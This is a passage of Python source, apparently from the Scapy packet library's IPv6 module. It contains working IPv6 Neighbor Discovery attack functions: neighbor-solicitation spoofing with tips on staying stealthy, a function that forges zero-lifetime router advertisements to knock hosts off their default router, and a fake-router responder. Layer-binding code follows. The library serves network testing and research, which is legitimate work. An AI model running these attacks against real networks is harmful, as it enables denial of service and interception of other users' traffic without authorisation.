         reach all hosts on the link. To be more stealth, provide the
         address of the victim so that it is the only receiver.

    src_mac: Ethernet source address of the packet. By default, this is
             the address of the interface. Another value can be provided
             to be more stealth. Note that this address is not the one
             the victim will use to populate its neighbor cache.

    dst_mac: Ethernet destination address of the packet. When not
             provided, it is computed if the IPv6 destination is multicast
             (all-nodes, solicited-node, ...), and obtained through a
             neighbor solicitation if it is unicast. Provide it explicitly
             if the attack has to remain stealth.

    loop: True by default, meaning that the NS is sent in loop, every
          'inter' seconds. When False, a single packet is sent.

    inter: interval, in seconds, between two NS when 'loop' is True.

    iface: to force the sending interface.
    """

    iface = iface or conf.iface

    # The advertised link-layer address defaults to the one of the
    # emitting interface.
    src_lladdr = src_lladdr or get_if_hwaddr(iface)

    # Only set the Ethernet addresses that were explicitly requested
    l2_fields = {}
    for field, value in (("src", src_mac), ("dst", dst_mac)):
        if value:
            l2_fields[field] = value

    l3_fields = {}
    if src:
        l3_fields["src"] = src
    # Without an explicit destination, fall back on the solicited-node
    # multicast address associated with the target address.
    l3_fields["dst"] = dst or inet_ntop(
        socket.AF_INET6,
        in6_getnsma(inet_pton(socket.AF_INET6, target)),
    )

    pkt = (
        Ether(**l2_fields) /
        IPv6(**l3_fields) /
        ICMPv6ND_NS(tgt=target) /
        ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr)
    )

    sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0)
3958
3959
def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None,
                                   ip_src_filter=None, reply_mac=None,
                                   tgt_mac=None):
    """
    The purpose of the function is to monitor incoming RA messages
    sent by default routers (RA with a non-zero Router Lifetime value)
    and invalidate them by immediately replying with fake RA messages
    advertising a zero Router Lifetime value.

    The result on receivers is that the router is immediately invalidated,
    i.e. the associated entry is discarded from the default router list
    and destination cache is updated to reflect the change.

    By default, the function considers all RA messages with a non-zero
    Router Lifetime value but provides configuration knobs to allow
    filtering RA sent by specific routers (Ethernet or IPv6 source
    address). With regard to emission, the multicast all-nodes address is
    used by default but a specific target can be used, in order for the
    DoS to apply only to a specific host.

    The function does not return a value: it hands control to sniff() and
    prints one line on stdout for each fake RA sent.

    More precisely, following arguments can be used to change the behavior:

    iface: a specific interface (e.g. "eth0") of the system on which the
           DoS should be launched. If None is provided conf.iface is used.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only RA messages received from this source will trigger replies.
         If other default routers advertised their presence on the link,
         their clients will not be impacted by the attack. The default
         value is None: the DoS is not limited to a specific mac address.

    ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
         on. Only RA messages received from this source address will
         trigger replies. If other default routers advertised their
         presence on the link, their clients will not be impacted by the
         attack. The default value is None: the DoS is not limited to a
         specific IPv6 source address.

    reply_mac: allow specifying a specific source mac address for the
         reply, i.e. to prevent the use of the mac address of the
         interface.

    tgt_mac: allow limiting the effect of the DoS to a specific host,
         by sending the "invalidating RA" only to its mac address.
    """

    def is_request(req, mac_src_filter, ip_src_filter):
        """
        Tell whether req is an RA that must be invalidated.

        Returns 1 when req is an Ether/IPv6/RA packet that passes the
        optional source filters and has a non-zero Router Lifetime,
        0 otherwise.
        """

        if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req):
            return 0

        mac_src = req[Ether].src
        if mac_src_filter and mac_src != mac_src_filter:
            return 0

        ip_src = req[IPv6].src
        if ip_src_filter and ip_src != ip_src_filter:
            return 0

        # Check if this is an advertisement for a Default Router
        # by looking at Router Lifetime value
        if req[ICMPv6ND_RA].routerlifetime == 0:
            return 0

        return 1

    def ra_reply_callback(req, reply_mac, tgt_mac, iface):
        """
        Callback that sends an RA with a 0 lifetime.

        The fake RA reuses the IPv6 source address of req, carries the
        Prefix Information options found in req and a Source Link-Layer
        Address option, and is sent to ff02::1 on iface. reply_mac and
        tgt_mac, when set, are used as Ethernet source and destination.
        """

        # Let's build a reply and send it

        src = req[IPv6].src

        # Select the link-layer address to advertise BEFORE walking the
        # Prefix Information options: the walk below detaches the payload
        # of each PIO, which truncates req. A Source Link-Layer Address
        # option located after a PIO would then not be found in req
        # anymore and the Ethernet source would silently be used instead.
        if ICMPv6NDOptSrcLLAddr in req:
            mac = req[ICMPv6NDOptSrcLLAddr].lladdr
        else:
            mac = req[Ether].src

        # Prepare packets parameters
        ether_params = {}
        if reply_mac:
            ether_params["src"] = reply_mac

        if tgt_mac:
            ether_params["dst"] = tgt_mac

        # Basis of fake RA (high pref, zero lifetime)
        rep = Ether(**ether_params) / IPv6(src=src, dst="ff02::1")
        rep /= ICMPv6ND_RA(prf=1, routerlifetime=0)

        # Add it the PIO from the request: each one is isolated from
        # what follows it before being appended to the reply ...
        tmp = req
        while ICMPv6NDOptPrefixInfo in tmp:
            pio = tmp[ICMPv6NDOptPrefixInfo]
            tmp = pio.payload
            del pio.payload
            rep /= pio

        # ... and source link layer address option
        rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac)

        sendp(rep, iface=iface, verbose=0)

        print("Fake RA sent with source address %s" % src)

    if not iface:
        iface = conf.iface
    # To prevent sniffing our own traffic
    if not reply_mac:
        reply_mac = get_if_hwaddr(iface)
    sniff_filter = "icmp6 and not ether src %s" % reply_mac

    sniff(store=0,
          filter=sniff_filter,
          lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
          prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface),
          iface=iface)
4080
4081
def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None,
                           ip_src_filter=None):
    """
    Watch the link for RS messages and answer each of them with the
    provided RA. The RA is emitted at layer 2, which means a packet
    starting with IPv6 will not work. In the end, the function is a simple
    wrapper around sendp() that monitors the link for RS messages.

    An example probably explains it better:

      >>> ra  = Ether()/IPv6()/ICMPv6ND_RA()
      >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64)
      >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64)
      >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55")
      >>> NDP_Attack_Fake_Router(ra, iface="eth0")
      Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573
      Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae
      ...

    The behavior can be changed using the following arguments:

    ra: the RA message sent in response to each received RS message.

    iface: a specific interface (e.g. "eth0") of the system on which the
           DoS should be launched. If none is provided, conf.iface is
           used.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only RS messages received from this source trigger a reply.
         The provided RA is sent as is: if the intent is to target only
         the source of the RS using this option, the Ethernet destination
         address of the RA has to be set to the same value by the caller.
         The default value is None: no filtering on the source of RS is
         done.

    ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
         on. Only RS messages received from this source address trigger
         replies. As for the previous argument, a specific Ethernet
         destination address will probably have to be set in the RA when
         this option is used.
    """

    def is_request(req, mac_src_filter, ip_src_filter):
        """
        Return 1 if req is an Ether/IPv6/RS packet accepted by the
        optional source filters, 0 otherwise.
        """

        if Ether not in req or IPv6 not in req or ICMPv6ND_RS not in req:
            return 0

        if mac_src_filter and req[Ether].src != mac_src_filter:
            return 0

        if ip_src_filter and req[IPv6].src != ip_src_filter:
            return 0

        return 1

    def ra_reply_callback(req, iface):
        """
        Send the RA in response to the RS found in req and report it.
        """

        rs_source = req[IPv6].src
        sendp(ra, iface=iface, verbose=0)
        print("Fake RA sent in response to RS from %s" % rs_source)

    iface = iface or conf.iface

    sniff(store=0,
          filter="icmp6",
          lfilter=lambda p: is_request(p, mac_src_filter, ip_src_filter),
          prn=lambda p: ra_reply_callback(p, iface),
          iface=iface)
4161
4162#############################################################################
4163# Pre-load classes ##
4164#############################################################################
4165
4166
def _get_cls(name):
    """
    Return the module-level object called name, or Raw when this module
    defines no such name.
    """
    namespace = globals()
    if name in namespace:
        return namespace[name]
    return Raw
4169
4170
def _load_dict(d):
    """
    Replace, in place, every value of d with what _get_cls() returns
    for it. The keys of d are left untouched.
    """
    for key in list(d):
        d[key] = _get_cls(d[key])
4174
4175
# Replace, in place, every value of the three lookup tables below with what
# _get_cls() returns for it: the object of that name defined in this module,
# or Raw when no such name exists.
# NOTE(review): presumably the tables hold class names as strings up to this
# point -- confirm against the definitions of the tables.
_load_dict(icmp6ndoptscls)
_load_dict(icmp6typescls)
_load_dict(ipv6nhcls)
4179
4180#############################################################################
4181#############################################################################
4182# Layers binding #
4183#############################################################################
4184#############################################################################
4185
# Declare IPv6 and IPv46 in the layer 3 and layer 2 type tables of conf.
# NOTE(review): the difference between register() and register_num2layer()
# is not visible from here -- presumably the latter only declares the
# number-to-layer direction; confirm against the tables' implementation.
conf.l3types.register(ETH_P_IPV6, IPv6)
conf.l3types.register_num2layer(ETH_P_ALL, IPv46)
# NOTE(review): 31 is a bare link type number whose meaning is not visible
# in this part of the file -- confirm which link type it stands for.
conf.l2types.register(31, IPv6)
conf.l2types.register(DLT_IPV6, IPv6)
conf.l2types.register(DLT_RAW, IPv46)
conf.l2types.register_num2layer(DLT_RAW_ALT, IPv46)

# IPv6 on top of the link layers and encapsulations: each binding is keyed
# on the value 0x86dd of the field named in the call.
bind_layers(Ether, IPv6, type=0x86dd)
bind_layers(CookedLinux, IPv6, proto=0x86dd)
bind_layers(GRE, IPv6, proto=0x86dd)
bind_layers(SNAP, IPv6, code=0x86dd)
# AF_INET6 values are platform-dependent. For a detailed explanation, read
# https://github.com/the-tcpdump-group/libpcap/blob/f98637ad7f086a34c4027339c9639ae1ef842df3/gencode.c#L3333-L3354  # noqa: E501
if WINDOWS:
    # Fixed value used on Windows instead of socket.AF_INET6
    bind_layers(Loopback, IPv6, type=0x18)
else:
    bind_layers(Loopback, IPv6, type=socket.AF_INET6)
# Upper layers of IPv6 (and of IPerror6), selected by the 'nh' field
bind_layers(IPerror6, TCPerror, nh=socket.IPPROTO_TCP)
bind_layers(IPerror6, UDPerror, nh=socket.IPPROTO_UDP)
bind_layers(IPv6, TCP, nh=socket.IPPROTO_TCP)
bind_layers(IPv6, UDP, nh=socket.IPPROTO_UDP)
# Tunnels: IPv6 in IPv4, IPv6 in IPv6, IPv4 in IPv6 and GRE over IPv6
bind_layers(IP, IPv6, proto=socket.IPPROTO_IPV6)
bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6)
bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP)
bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE)